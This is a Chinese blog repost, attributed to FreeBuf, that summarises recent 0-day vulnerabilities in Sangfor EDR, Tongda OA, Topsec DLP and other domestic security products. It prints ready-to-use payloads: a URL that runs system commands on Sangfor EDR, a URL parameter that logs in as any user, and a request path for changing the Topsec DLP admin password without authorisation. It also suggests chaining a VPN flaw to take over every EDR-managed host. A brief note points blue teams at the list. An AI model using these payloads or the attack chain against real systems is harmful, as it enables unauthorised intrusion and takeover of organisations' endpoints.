近期你已经授权登录过_近期公开0day及漏洞汇总

一、深信服EDR设备RCE:

Payload:https://ip/tool/log/c.php?strip_slashes=system&host=id

e09b55dc4da8acf4c1b5c2ab5f9836c6.png

433448e68177fd387762c7b6ac2d1748.png

二、深信服EDR设备任意用户登录登录:

Payload:https://ip/ui/login.php?user=admin

通过更改user参数的值即可实现任意用户登录

4292d3892795b9cf08bc93b7088f45ff.png

97b3913dbaae42037ce8b75d9e938637.png

三、通达OA-v11.6 Getshell:

复现该漏洞会删除auth.inc.php,可能会导致应用的正常使用请勿进行未授权测试

dfe8471cf9b07882efbe062cd095c5c0.png

后台回复‘通达oa’可获取利用代码

四、天融信dlp-未授权+越权:

漏洞细节:管理员登录系统系统之后修改密码,未采用原密码校验,且存在未授权访问导致存在越权修改管理员密码。

默认用户superman的uid=1

POST  /?module-auth_user&action=mod_edit.pwd HTTP/1.1

五、致远OA-A8-V5最新版:GETshell-某大佬暂未公开

六、奇安信天擎EDR设备RCE:漏洞详情暂未知

影响范围:使用奇安信天擎EDR产品的主机

可以利用深信服vpn漏洞进入内网,然后利用此漏洞控制所有装有edr的机器

七、深信服vpn RCE:漏洞详情暂未知

最后:

近期蓝队应该关注的漏洞:

17254c78604173e02b896fe92b502bc0.png

转载于freebuf

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值